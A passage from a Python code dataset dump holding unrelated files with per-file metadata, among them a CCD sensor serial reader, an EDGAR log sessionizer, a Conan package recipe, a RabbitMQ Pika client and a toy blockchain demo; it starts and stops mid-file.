range(200):\n\t\t\t\ttime.sleep(0.01)\n\t\t\t\tn=self.serial_port.inWaiting()\n\t\t\t\tread_buf += self.serial_port.read(n)\n\t\t\t\tl+=n\n\t\t\t\tif l == 7296:\n\t\t\t\t\tbreak\n\t\t\t#print(i)\n\t\t\tkk=0\n\t\t\tif len(read_buf) == 7296:\n\t\t\t\tfor i in range(0,8,2):\n\t\t\t\t\tif (read_buf[i]*256+read_buf[i+1])==24930: kk+=1\n\t\t\t\t\tif (read_buf[7288+i]*256+read_buf[7289+i])==24930: kk+=1\n\t\t\t\tif kk>=2:\n\t\t\t\t\tfor i in range(0,7296,2):\n\t\t\t\t\t\t#print(i/2)\n\t\t\t\t\t\tccd_vol_array[int(i/2)]=read_buf[i]*256+read_buf[i+1]\n\t\t\t\telse:\n\t\t\t\t\tfor i in range(1,7295,2):\n\t\t\t\t\t\tccd_vol_array[int((i+1)/2)]=read_buf[i]*256+read_buf[i+1]\n\t\t\t\tccd_vol_array[0]=ccd_vol_array[1]=ccd_vol_array[2]=ccd_vol_array[3]=ccd_vol_array[4]=ccd_vol_array[5]\n\t\t\t\tccd_vol_array[3647]=ccd_vol_array[3646]=ccd_vol_array[3645]=ccd_vol_array[3644]=ccd_vol_array[3643]\n\t\telse:\n\t\t\tread_buf = b''\n\t\t\t\n\t\t\tk=0\n\t\t\t\n\t\t\t\n\t\t\tread_buf = self.serial_port.read(1)\n\t\t\twhile self.loop_sign==1:\n\t\t\t\tl = 1\n\t\t\t\twhile l<=7296:\n\t\t\t\t\tto_read = self.serial_port.inWaiting()\n\t\t\t\t\tread_buf += self.serial_port.read(to_read)\n\t\t\t\t\tl += to_read\n\t\t\t\tprint(l)\n\t\t\t\tprint('max:',max(read_buf))\n\t\t\t\t#time.sleep(5)\n\t\t\t\tfor i in range(to_read-1):\n\t\t\t\t\tprint(read_buf[i])\n\t\t\t\t\tif read_buf[i] == 255 and read_buf[i+1] == 252:\n\t\t\t\t\t\tprint('='*10, read_buf[i:(i+5)])\n\t\t\t\t\t\tp = len(read_buf)-i-1\n\t\t\t\t\t\t\n\t\t\t\t\t\tread_buf = self.serial_port.read(7296-p)\n\t\t\t\t\t\tself.loop_sign = 0\n\t\t\t\t\t\tprint('-'*10)\n\t\t\t\t\t\t#time.sleep(10)\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\tk+=1\n\t\t\t\tprint(k,to_read)\n\t\t\tprint('shift_found')\n\t\t\ttotal_read_buf = read_buf\n\t\t\tif self.loop_sign==0:\n\t\t\t\ttotal_read_buf = self.serial_port.read(7296)\n\t\t\t\t#total_read_buf = self.serial_port.read(7296)\n\t\t\t\tself.loop_sign = 1\n\t\t\tfor i in range(0,7296,2):\n\t\t\t\tccd_vol_array[int(i/2)]=total_read_buf[i]*256+total_read_buf[i+1];\n\t\t\tccd_vol_array[0]=ccd_vol_array[1]=ccd_vol_array[3647]=ccd_vol_array[2];\n\n\t\t\t'''\n\n\t\t\tbuf_sign = 0\n\t\t\ttemp_add=0;\n\t\t\tread_buf_B = []\n\t\t\tread_buf_A = []\n\t\t\ttotal_bytes = 0\n\t\t\ttemp_read_buf = self.serial_port.read(128)\n\n\t\t\tfor k in range(128):\n\t\t\t\tif buf_sign==0:\n\t\t\t\t\tread_buf_B\n\t\t\t\t\t\n\t\t\t'''\n\t\t#print(ccd_vol_array)\n\t\t\n\t\treturn ccd_vol_array\n\n\tdef read(self):\n\t\ttry:\n\t\t\ttime.sleep(0.1)\n\t\t\tdata = 
self.serial_port.read(1)\n\t\t\t#time.sleep(0.1)\n\t\t\tdata += self.serial_port.read(self.serial_port.inWaiting())\n\t\t\treturn data\n\t\texcept serial.SerialException as e:\n\t\t\tself.error_q.put(e)\n\t\t\treturn\n\n\tdef join(self, timeout=None):\n\t\tself.alive.clear()\n\t\tthreading.Thread.join(self, timeout)\n\n\tdef stop(self):\n\t\tself.alive.clear()\n\n\tdef lock_readout(self):\n\t\tself.alive.wait()\n\t\tself.lock.acquire()\n\n\tdef release_readout(self):\n\t\tself.alive.set()\n\t\tself.lock.release()\n\n\n\n\nif __name__ == '__main__':\n\tfrom pyqtgraph.Qt import QtGui, QtCore\n\timport numpy as np\n\timport pyqtgraph as pg\n\tfrom pyqtgraph.ptime import time as Time\n\timport random\n\tapp = QtGui.QApplication([])\n\n\tp = pg.plot()\n\tp.setWindowTitle('pyqtgraph example: PlotSpeedTest')\n\tp.setYRange(0,45000)\n\tp.setXRange(0,4000)\n\t\n\tp.setLabel('bottom', 'Index', units='B')\n\tcurves = []\n\tcolors = [\"red\",\"green\",\"blue\",\"orange\",\"purple\",\"pink\",\"yellow\"]\n\tfor i in range(100):\n\t\tcurve = p.plot()\n\t\tcurve.setPen(QtGui.QColor(random.choice(colors)))\n\t\t#curve.setFillLevel(2)\n\n\t\tcurves.append(curve)\n\t#curve.setFillLevel(0)\n\n\t#lr = pg.LinearRegionItem([100, 4900])\n\t#p.addItem(lr)\n\tccd = TCD1304(highSpeedMode=False,trigger=True, integration=100)\n\tccd.start()\n\n\tptr = 0\n\tlastTime = Time()\n\tfps = None\n\tt1=0\n\tdef update():\n\t\tglobal curve, data, ptr, p, lastTime, fps, t0, t1\n\t\t\n\t\tt0 = time.time()\n\t\t#print(t0-t1)\n\t\tcn = 0\n\t\tif ccd.data_q.empty():\n\t\t\t#time.sleep(0.2)\n\t\t\treturn\n\t\tstack = ccd.data_q.get()[0]\n\t\twhile not ccd.data_q.empty():\n\t\t\tstack += ccd.data_q.get()[0]\n\t\t\tcn+=1\n\t\t\tprint(\"#\",cn)\n\t\tdata = stack/(cn+1)\n\t\tcurves[0].setData(data)\n\t\t\t\n\t\t#ccd.data_q.clear()\n\t\tptr += 1\n\t\tnow = Time()\n\t\tdt = now - lastTime\n\t\tlastTime = now\n\t\tif fps is None:\n\t\t\tfps = 1.0/dt\n\t\telse:\n\t\t\ts = np.clip(dt*3., 0, 1)\n\t\t\tfps = fps * (1-s) + (1.0/dt) * s\n\t\tp.setTitle('%0.2f fps' % fps)\n\t\tapp.processEvents() ## force complete redraw for every plot\n\t\tt1 = time.time()\n\t\tprint(t1-t0)\n\ttimer = QtCore.QTimer()\n\ttimer.timeout.connect(update)\n\ttimer.start(0)\n\n\n\t## Start Qt event loop unless running in interactive mode.\n\tif __name__ == '__main__':\n\t\timport sys\n\t\tif (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n\t\t\tQtGui.QApplication.instance().exec_()\n","sub_path":"TCD1304.py","file_name":"TCD1304.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"392444956","text":"#!/usr/bin/env python3\n# Copyright 2009-2017 BHG http://bw.org/\n\nfrom datetime import datetime, date, time, timedelta\nimport sys\n\nipSessions = dict()\n\ndef removekey(d, key):\n r = dict(d)\n del r[key]\n return r\n\ndef sessionInactive(session, inactivePeriod, dateTime):\n if session and not session.isActive(inactivePeriod, dateTime):\n return True\n \ndef reportAndDeleteSessions(outFile, conditional = None):\n global ipSessions\n\n if conditional:\n inactivePeriod = conditional[0]\n requestDateTime = conditional[1]\n pred = conditional[2]\n\n if len(ipSessions) > 0:\n for ip,session in ipSessions.items():\n if session and (conditional and pred(session, inactivePeriod, requestDateTime) or not conditional):\n outString = ip+','+session.toString()\n print(outString.rstrip(), file = outFile)\n print(outString)\n ipSessions=removekey(ipSessions,ip)\n 
\ndef openFile(fileName, mode):\n    try:\n        return open (fileName, mode)\n    except IOError as e:\n        sys.exit(\"program failed: Input/Output error: %s\" % ( str(e) ) )\n\n    \nclass Session:\n    def __init__(self, requestDateTime):\n        self._requestCount = 1 \n        self._firstRequestDateTime= requestDateTime\n        self._lastRequestDateTime = requestDateTime\n\n    def docRequests(self):\n        return self._requestCount\n    \n    def isActive(self, inactivePeriod, requestTime):\n        if (self._lastRequestDateTime + timedelta(seconds = inactivePeriod) >= requestTime):\n            return True\n        else:\n            return False\n    \n    #should only be called if is active\n    def addDocumentRequest (self, requestDateTime):\n        self._requestCount = self._requestCount + 1\n        self._lastRequestDateTime=requestDateTime\n    \n    def toString(self):\n        return(self.__str__())\n    \n    def __str__ (self):\n        duration = self._lastRequestDateTime - self._firstRequestDateTime \n        return (self._firstRequestDateTime.strftime('%Y-%m-%d %H:%M:%S') + ',' + self._lastRequestDateTime.strftime('%Y-%m-%d %H:%M:%S') + ','\n                + str (int(duration.total_seconds()) + 1)+ ',' + str(self.docRequests()) ) \n    \ndef main():\n    \n    in_edgarLog_path = '../insight_testsuite/tests/test_1/input/log.csv' if len(sys.argv) < 4 else sys.argv[1]\n    in_edgarLog = openFile(in_edgarLog_path, 'rt')\n    \n    in_inactPeriod_path = '../insight_testsuite/tests/test_1/input/inactivity_period.txt' if len(sys.argv) < 4 else sys.argv[2]\n    in_inactPeriod = openFile(in_inactPeriod_path, 'rt')\n\n    out_sessionization_path = '../insight_testsuite/tests/test_1/output/sessionization2.txt' if len(sys.argv) < 4 else sys.argv[3]\n    out_sessionization = openFile(out_sessionization_path, \"wt\")\n\n    inactivityPeriod = int(in_inactPeriod.read())\n    \n    head = True\n    for line in in_edgarLog:\n        if head:\n            fields = line.rstrip().split(',')\n            head = False\n        else:\n            values = line.rstrip().split(',')\n            #Process record only if it references a valid document\n            if (values[fields.index('cik')] and values[fields.index('accession')] and values[fields.index('extention')]):\n                try:\n                    ip = values[fields.index('ip')]\n                    date = values[fields.index('date')]\n                    time = values[fields.index('time')]\n                    dateTime = date+'-'+time\n                    datetime_object = datetime.strptime(dateTime, '%Y-%m-%d-%H:%M:%S')\n                    reportAndDeleteSessions(out_sessionization, (inactivityPeriod,datetime_object, sessionInactive))\n                    if ip in ipSessions.keys():\n                        currentSession = ipSessions.get(ip)\n                        if currentSession and currentSession.isActive(inactivityPeriod, datetime_object):\n                            currentSession.addDocumentRequest(datetime_object)\n                        else: #overwrite IP session record\n                            ipSessions[ip] = Session (datetime_object)\n                    else: #create an IP session record\n                        ipSessions[ip] = Session (datetime_object)\n                except Exception:\n                    print('Invalid EDGAR weblog record: Record Skipped')\n    \n    reportAndDeleteSessions(out_sessionization)\n\n    in_edgarLog.close()\n    in_inactPeriod.close()\n    out_sessionization.close()\n    \n\n    \nif __name__ == '__main__': main()\n","sub_path":"src/sessionization.py","file_name":"sessionization.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"101160041","text":"from preprocessing_utils import Preprocessing, ModelImporter\n\nimport torch\n\n\n\nif __name__ == '__main__':\n\n    pre = Preprocessing('digits')\n    pre.load_data(filename='test.csv', name='test')\n\n    X_df = pre.get(name='test').drop(columns=['0'])\n    y_df = pre.get(name='test')['0']\n\n    dtype = torch.float\n    device = torch.device(\"cpu\")\n\n    model_name 
= 'cnn_digits'\n\n m_importer = ModelImporter('digits')\n\n model = m_importer.load_nn_model(model_name, 0, 10, 100)\n\n X_test = model.reshape_data(torch.tensor(X_df.values, device=device, dtype=dtype))\n y_test = torch.tensor(y_df.values, device=device, dtype=torch.long)\n\n y_pred = model(X_test).argmax(1)\n\n accuracy_soft = (y_pred == y_test).float().mean()\n\n\n print(f'test accuracy {accuracy_soft.item()}')\n","sub_path":"src/scripts/test/digits_cnn.py","file_name":"digits_cnn.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"590114551","text":"from conans import ConanFile, CMake, tools\nimport os\n\n\nclass RestinioConan(ConanFile):\n name = \"restinio\"\n version = \"0.6.4\"\n\n license = \"BSD-3-Clause\"\n url = \"https://github.com/Stiffstream/restinio-conan\"\n\n description = (\n \"RESTinio is a header-only C++14 library that gives you \"\n \"an embedded HTTP/Websocket server.\"\n )\n\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {'boost_libs': ['none', 'static', 'shared'], 'use_openssl': ['false', 'true']}\n default_options = {'boost_libs': 'none', 'use_openssl': 'false'}\n generators = \"cmake\"\n source_subfolder = \"restinio\"\n build_policy = \"missing\"\n\n def requirements(self):\n self.requires.add(\"http-parser/2.8.1@bincrafters/stable\")\n self.requires.add(\"fmt/6.1.2\")\n\n if self.options.boost_libs == \"none\":\n self.requires.add(\"asio/1.12.2@bincrafters/stable\")\n else:\n self.requires.add(\"boost/1.69.0@conan/stable\")\n if self.options.boost_libs == \"shared\":\n self.options[\"boost\"].shared = True\n else:\n self.options[\"boost\"].shared = False\n \n if self.options.use_openssl == \"true\":\n self.requires.add(\"openssl/1.1.1d\")\n\n def source(self):\n source_url = \"https://github.com/Stiffstream/restinio/releases/download/\"\n tools.get(\"{0}v.{1}/restinio-{1}.zip\".format(source_url, self.version))\n extracted_dir = \"restinio-\" + self.version\n os.rename(extracted_dir, self.source_subfolder)\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.definitions['RESTINIO_INSTALL'] = True\n cmake.definitions['RESTINIO_FIND_DEPS'] = False\n cmake.definitions['RESTINIO_USE_BOOST_ASIO'] = self.options.boost_libs\n cmake.configure(source_folder = self.source_subfolder + \"/dev/restinio\")\n return cmake\n\n def package(self):\n self.copy(src=self.source_subfolder, pattern=\"LICENSE*\", dst=\"licenses\")\n cmake = self._configure_cmake()\n self.output.info(cmake.definitions)\n cmake.install()\n\n def package_info(self):\n self.info.header_only()\n if self.options.boost_libs != \"none\":\n self.cpp_info.defines.append(\"RESTINIO_USE_BOOST_ASIO\")\n","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"234487512","text":"from sqlalchemy import Column, String, Integer, Date\nfrom sqlalchemy.orm import relationship\n\nfrom dataLayer.database_connection import Base\n\n\nclass Movement(Base):\n __tablename__ = 'Movement'\n\n id = Column('Id', Integer, primary_key=True)\n message = Column('Message', String)\n image = relationship('ImageAttachment', uselist=False)\n\n def __init__(self, message, image):\n self.message = message\n self.image = 
image\n","sub_path":"FaceRecognition/dataLayer/entities/movement.py","file_name":"movement.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"381870277","text":"import torch\nimport numpy as np\nimport math\n\nclass Criterion():\n\tdef __init__(self):\n\t\tpass\n\n\tdef forward(self, input, target):\n\t\tlenn = input.size()[0]\n\t\tindices = target.view(lenn).numpy()\n\t\thotTarget = (torch.zeros(input.size())).type(torch.DoubleTensor)\n\t\thotTarget[np.arange(lenn), indices] = 1\n\n\t\t##convert input using softmax\n\t\tprobabs = input - torch.max(input, dim=1, keepdim=True)[0]\n\t\tprobabs = probabs.exp()\n\t\tprobabs = probabs/probabs.sum(dim = 1, keepdim = True)\n\t\t\n\t\t##compute log probabs for cross entropy\n\t\t#probabs = hotTarget*probabs + (1 - hotTarget)*(1 - probabs)\n\t\tlogProbabs = ((probabs).log())*hotTarget\n\t\treturn -(logProbabs.sum())/float(lenn)\n\n\tdef backward(self, input, target):\n\t\tlenn = input.size()[0]\n\t\tb = input.size()[1]\n\t\tindices = target.view(lenn).numpy()\n\t\thotTarget = (torch.zeros(input.size())).type(torch.DoubleTensor)\n\t\thotTarget[np.arange(lenn), indices] = 1\n\n\t\t##convert input using softmax\n\t\tprobabs = input - torch.max(input, dim=1, keepdim=True)[0]\n\t\tprobabs = probabs.exp()\n\t\tprobabs = probabs/probabs.sum(dim = 1, keepdim = True)\n\t\t#probabs = hotTarget*probabs + (1 - hotTarget)*(1 - probabs)\n\t\t\n\t\t##calculate the loss\n\t\tlogProbabs = (probabs).log()*hotTarget \n\t\tloss = -(logProbabs.sum())/float(lenn)\n\n\t\t##calculate derivative\n\t\tgrad = probabs - hotTarget\n\t\tgrad = grad/float(lenn)\n\t\treturn grad","sub_path":"src/Criterion.old.py","file_name":"Criterion.old.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"122754979","text":"import logging\r\nimport ssl\r\nimport configparser\r\n\r\nclass Parser(configparser.ConfigParser):\r\n def __init__(self):\r\n super(configparser.ConfigParser, self).__init__(inline_comment_prefixes=(\"#\", \";\"))\r\n def getint(self, s, k, fallback):\r\n try: return configparser.ConfigParser.getint(self, s, k)\r\n except: return fallback\r\n def getfloat(self, s, k, fallback):\r\n try: return configparser.ConfigParser.getfloat(self, s, k)\r\n except: return fallback\r\n def getboolean(self, s, k, fallback):\r\n try: return configparser.ConfigParser.getboolean(self, s, k)\r\n except: return fallback\r\n \r\ndef parse(filename, required_fields={}, optional_fields={}):\r\n cfg = Parser()\r\n cfg.read(filename)\r\n\r\n config = {}\r\n for s in required_fields.keys():\r\n if not s in cfg: raise Exception(\"Unable to find {} section. Exiting\".format(s))\r\n for k, t in required_fields[s]:\r\n if not k in cfg[s]: raise Exception(\"Unable to find {}:{}. Exiting\".format(s, k))\r\n elif t == \"int\":\r\n config[k] = cfg.getint(s, k, fallback=None)\r\n if config[k] == None: raise Exception(\"Invalid value type for {}:{}. Expected {}\".format(s, k, t))\r\n elif t == \"float\":\r\n config[k] = cfg.getfloat(s, k, fallback=None)\r\n if config[k] == None: raise Exception(\"Invalid value type for {}:{}. Expected {}\".format(s, k, t))\r\n elif t == \"boolean\":\r\n config[k] = cfg.getboolean(s, k, fallback=None)\r\n if config[k] == None: raise Exception(\"Invalid value type for {}:{}. 
Expected {}\".format(s, k, t))\r\n else:\r\n config[k] = cfg.get(s, k)\r\n\r\n for s in optional_fields.keys():\r\n for k, t, f in optional_fields[s]:\r\n if t == \"int\":\r\n config[k] = cfg.getint(s, k, fallback=f)\r\n elif t == \"float\":\r\n config[k] = cfg.getfloat(s, k, fallback=f)\r\n elif t == \"boolean\":\r\n config[k] = cfg.getboolean(s, k, fallback=f)\r\n else:\r\n config[k] = cfg.get(s, k, fallback=f)\r\n\r\n\r\n return config\r\n\r\ndef getContext(**kwargs):\r\n context = ssl.SSLContext(kwargs[\"protocol\"])\r\n context.check_hostname = False\r\n context.load_verify_locations(kwargs['trustedca'])\r\n context.load_cert_chain(kwargs['certpath'], kwargs['keypath'])\r\n\r\n return context\r\n\r\n\r\ndef getLogger(**kwargs):\r\n if getLogger.invoked:\r\n return logging.getLogger(\"network-capture\")\r\n getLogger.invoked = True\r\n \r\n logger = logging.getLogger('network-capture')\r\n formatter = logging.Formatter('%(asctime)s - %(threadName)s - %(message)s')\r\n logger.setLevel(logging.DEBUG)\r\n ch = logging.StreamHandler()\r\n ch.setLevel(logging.INFO)\r\n ch.setFormatter(formatter)\r\n logger.addHandler(ch)\r\n\r\n ch.setFormatter(formatter)\r\n\r\n if kwargs['logfile'] != None:\r\n fh = logging.FileHandler(kwargs['logfile'])\r\n fh.setLevel(logging.DEBUG)\r\n fh.setFormatter(formatter)\r\n logger.addHandler(fh)\r\n\r\n return logger\r\n\r\ngetLogger.invoked = False\r\n\r\n\r\n","sub_path":"src/client/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"613517869","text":"'''\r\nSmall program to help show and explain the concept of a blockchain\r\nCreated as a little side project during university revision.\r\nPlease note that this is no proper full blockchain, it is very simple, primitive\r\nand will not operate as a full block chain (there is no server backend processing\r\nand all that lovely stuff!)\r\nHowever, you are able to create a blockchain with an infinate amount of blocks\r\nand search for any one you wish.\r\nThank you for your time looking at this code.\r\nDont hestiate to E-mail me for questions and how I can improve!\r\n ( harry.ej.smith@gmail.com )\r\nThanks again,\r\n - Harry Smith\r\n (Coventry Univeristy Cyber Security student)\r\n \r\n17/04/2018\r\n'''\r\n\r\n#import the hash, sys, collections and datetime modules\r\nimport hashlib\r\nimport sys\r\nimport collections\r\nfrom datetime import datetime\r\n\r\n\r\n\r\n'''Class for creation and extention of a mini, very basic, blockchain is below.\r\n\r\n The Class method called \"returnBlockData\" (line 61) uses a data structure new to\r\n python 3.3, called a Named Tuple.. It's very similar to a simple tuple - a tuple is an immutable\r\n data structure - but instead of calling it's values using an index i.e [0]\r\n it will use a class call instead.\r\n\r\n So, see the method below, it will add the following block data to a named tuple:\r\n 1. The previous hash\r\n 2. The input data\r\n 3. 
Date and Time of block creation\r\n This block data can then be called using the values we assigned to it.\r\n For example, we called the previous hash to be = \"hashVal\".\r\n \r\n If you see line 105, you will see by putting blockList[y].hashVal\r\n we get the hash value!\r\n Named Tuples are a very powerful, simple and memory efficient way\r\n of handling data.\r\n'''\r\n\r\n\r\nclass BlockChain():\r\n blockId = 0 # Unique number for each block\r\n\r\n def __init__(self,prevHash,inpData): # Constructor used to generate a new block in the chain\r\n self.blockIdNum = BlockChain.blockId\r\n BlockChain.blockId = BlockChain.blockId +1\r\n self.inpData = inpData\r\n self.dateTime = datetime.utcnow()\r\n self.prevHash = prevHash\r\n\r\n # Hashes input data and datetime along with the hash of the previous block. \r\n self.currentHash = hashlib.md5((self.inpData+self.prevHash+str(self.dateTime)).encode()).hexdigest() \r\n\r\n def returnBlockData(self):\r\n BlockData = collections.namedtuple('Data', 'hashVal inpData dateTime') # Initialising the Named Tuple\r\n \r\n # Assiging Hash, Data, Date and Time to the named Tuple and returning it.\r\n currentBlockData = BlockData(hashVal = self.currentHash, inpData = self.inpData, dateTime = self.dateTime) \r\n return currentBlockData\r\n\r\n\r\n'''\r\nFunction to create the very first block of the block chain.\r\nTakes no input parameters and outputs a hash value.\r\nNOTE: This block is special from the rest in that it does not\r\n take a hash as input, instead it hashes a predetermined\r\n piece of information\r\n'''\r\ndef genesisBlock():\r\n inpData = \"Fidget the very fast Migdet\"\r\n dateTime = str(datetime.utcnow())\r\n return str(hashlib.md5((inpData+str(dateTime)).encode()).hexdigest()) \r\n\r\n\r\n\r\n'''Main Function'''\r\ndef main():\r\n blockList = {}\r\n blockList[0]=(genesisBlock()) # Appends the Genesis Block hash to blockList dictionary\r\n prevHash = blockList[0] # Sets the genesis block hash to a variable to be used in\r\n # the class\r\n # The blockList dictionary has the blockId set as the key\r\n # and the block's data as the dictionary value. \r\n\r\n try:\r\n z = int(input(\"How many blocks do you wish to create?\\n\"))\r\n if z<0:\r\n raise ValueError\r\n for i in range (0,z+1):\r\n x=BlockChain(prevHash, \"1234\") # Creates a new block. \"1234\" is the input data (This can be changed)\r\n blockList[x.blockIdNum]=(x.returnBlockData()) # Saves the new block's data to dictionary with blockID as the key\r\n prevHash = blockList[x.blockIdNum].hashVal # and named tuple as the value.\r\n # Finally, sets the previous hash variable to the hash of the new block.\r\n\r\n # This try statement is used to print a whole block of the user's choosing\r\n try: \r\n y = int(input (\"What block do you wish to view? (between 0 and \"+str(z)+\")\\n\"))\r\n print (str(blockList[y].hashVal) + \" is the hash for block number \"+ str(y))\r\n print (\"It was created on \" + str(blockList[y].dateTime)+\" UTC,\")\r\n print (\"and the block's data is: \" + str(blockList[y].inpData))\r\n except (TypeError, ValueError,KeyError): # Catches any user input errors. 
\r\n print (\"Invalid input, please try again!\")\r\n \r\n except(TypeError, ValueError): # Catches any user input errors.\r\n print (\"Invalid input, please restart and input a positive number.\")\r\n finally:\r\n print (\"Thanks!\")\r\n \r\n #print (blockList) # Uncomment this to print out the whole block chain.\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.exit(main())\r\n","sub_path":"Python3/Old/MiniBlockChain.py","file_name":"MiniBlockChain.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"361692264","text":"class Solution:\n def convert(self, s, numRows):\n if numRows <= 1:\n return s\n res = [''] * numRows\n i = 0\n flag = 'pos'\n for j in s:\n res[i] += j\n\n if i >= numRows - 1:\n flag = 'neg'\n elif i <= 0:\n flag = 'pos'\n\n i = i + 1 if flag == 'pos' else i - 1\n\n return ''.join(res[:])\n\n\ns = Solution()\nprint(s.convert(s=\"ABCDEFGH\", numRows=3))\n","sub_path":"Leetcode/Zigzag Conversion.py","file_name":"Zigzag Conversion.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"574551251","text":"from collections import defaultdict\nimport json\nimport logging\nfrom django.conf import settings\nfrom django.utils.timezone import now\nimport pika\nfrom pika.adapters.tornado_connection import TornadoConnection\nfrom pika.exceptions import AMQPConnectionError\nimport time\nfrom django_sockjs_server.lib.config import SockJSSereverSettings\n\n\nclass PikaClient(object):\n def __init__(self, io_loop):\n self.logger = logging.getLogger(__name__)\n self.logger.info('PikaClient: __init__')\n self.io_loop = io_loop\n\n self.connected = False\n self.connecting = False\n self.connection = None\n self.channel = None\n\n self.event_listeners_count = 0\n self.event_listeners = set()\n self.subscrib_channel = defaultdict(set)\n self.last_reconnect = now()\n self.uptime_start = now()\n\n\n\n self.config = SockJSSereverSettings()\n\n def connect(self):\n if self.connecting:\n self.logger.info('django-sockjs-server(PikaClient): Already connecting to RabbitMQ')\n return\n\n self.logger.info('django-sockjs-server(PikaClient): Connecting to RabbitMQ')\n self.connecting = True\n\n cred = pika.PlainCredentials(self.config.rabbitmq_user, self.config.rabbitmq_password)\n param = pika.ConnectionParameters(\n host=self.config.rabbitmq_host,\n port=self.config.rabbitmq_port,\n virtual_host=self.config.rabbitmq_vhost,\n credentials=cred\n )\n\n try:\n self.connection = TornadoConnection(param,\n on_open_callback=self.on_connected)\n self.connection.add_on_close_callback(self.on_closed)\n except AMQPConnectionError:\n self.logger.info('django-sockjs-server(PikaClient): error connect, wait 5 sec')\n time.sleep(5)\n self.reconnect()\n\n self.last_reconnect = now()\n\n def on_connected(self, connection):\n self.logger.info('django-sockjs-server(PikaClient): connected to RabbitMQ')\n self.connected = True\n self.connection = connection\n self.connection.channel(self.on_channel_open)\n\n def on_channel_open(self, channel):\n self.logger.info('django-sockjs-server(PikaClient): Channel open, Declaring exchange')\n self.channel = channel\n self.channel.exchange_declare(exchange=self.config.rabbitmq_exhange_name,\n exchange_type=self.config.rabbitmq_exchange_type)\n self.channel.queue_declare(exclusive=False, auto_delete=True, callback=self.on_queue_declared)\n\n def on_queue_declared(self, frame):\n 
self.logger.info('django-sockjs-server(PikaClient): queue bind')\n self.channel.queue_bind(callback=None, exchange=self.config.rabbitmq_exhange_name, queue=frame.method.queue)\n self.channel.basic_consume(self.handle_delivery, queue=frame.method.queue, no_ack=True)\n\n def handle_delivery(self, channel, method, header, body):\n \"\"\"Called when we receive a message from RabbitMQ\"\"\"\n self.notify_listeners(body)\n\n def on_closed(self, connection, error_code, error_message):\n self.logger.info('django-sockjs-server(PikaClient): rabbit connection closed, wait 5 seconds')\n connection.add_timeout(5, self.reconnect)\n\n def reconnect(self):\n self.connecting = False\n self.logger.info('django-sockjs-server(PikaClient): reconnect')\n self.connect()\n\n def notify_listeners(self, event_json):\n event_obj = json.loads(event_json)\n\n self.logger.debug('django-sockjs-server(PikaClient): get new data = %s ' % event_obj)\n try:\n if len(self.subscrib_channel[event_obj['channel']]) > 0:\n for client in self.subscrib_channel[event_obj['channel']]:\n self.logger.debug('django-sockjs-server(PikaClient): send message channel = %s ' % event_obj['channel'])\n client.broadcast(self.subscrib_channel[event_obj['channel']], event_json)\n break\n except KeyError:\n pass\n\n def add_event_listener(self, listener):\n self.event_listeners.add(listener)\n self.event_listeners_count += 1\n self.logger.debug('django-sockjs-server(PikaClient): listener %s added' % repr(listener))\n\n def remove_event_listener(self, listener):\n try:\n self.event_listeners.remove(listener)\n self.event_listeners_count -= 1\n self.logger.debug('django-sockjs-server(PikaClient): listener %s removed' % repr(listener))\n except KeyError:\n pass\n\n def add_subscriber_channel(self, chanel, client):\n self.subscrib_channel[chanel].add(client)\n self.logger.debug('django-sockjs-server(PikaClient): listener %s add to channel %s' % (repr(client), chanel))\n\n def remove_subscriber_channel(self, chanel, client):\n try:\n self.subscrib_channel[chanel].remove(client)\n self.logger.debug('django-sockjs-server(PikaClient): listener %s remove from channel %s' % (repr(client),\n chanel))\n except KeyError:\n pass\n\n def get_event_listeners_count(self):\n return self.event_listeners_count\n\n def get_subscribe_channel_count(self):\n return len(self.subscrib_channel.keys())\n\n def get_subscribe_channels(self):\n return self.subscrib_channel.keys()\n\n def get_last_reconnect(self):\n return self.last_reconnect\n\n def get_uptime(self):\n return (now() - self.uptime_start).seconds","sub_path":"django_sockjs_server/lib/pika_client.py","file_name":"pika_client.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"639661847","text":"from gpiozero import Motor\nimport time\n\n#핀 수정 후 다시 테스트\nmotor = Motor(forward=19,backward=13,enable=26)\n\ndef motorforward(s):\n print('모터회전방향 :Forward')\n motor.forward(speed=s)\n time.sleep(1)\n motor.stop()\n\nmotorforward(1)\n \n","sub_path":"rccar +waterpump/water_pump.py","file_name":"water_pump.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"267468927","text":"import scrapy\nimport time\nfrom comics.items import ComicsItem\nfrom scrapy.pipelines.images import ImagesPipeline\n\nclass ComicsSpider(scrapy.Spider):\n name = \"Comics\"\n custom_settings = {\n 'DOWNLOADER_MIDDLEWARES' : {\n 
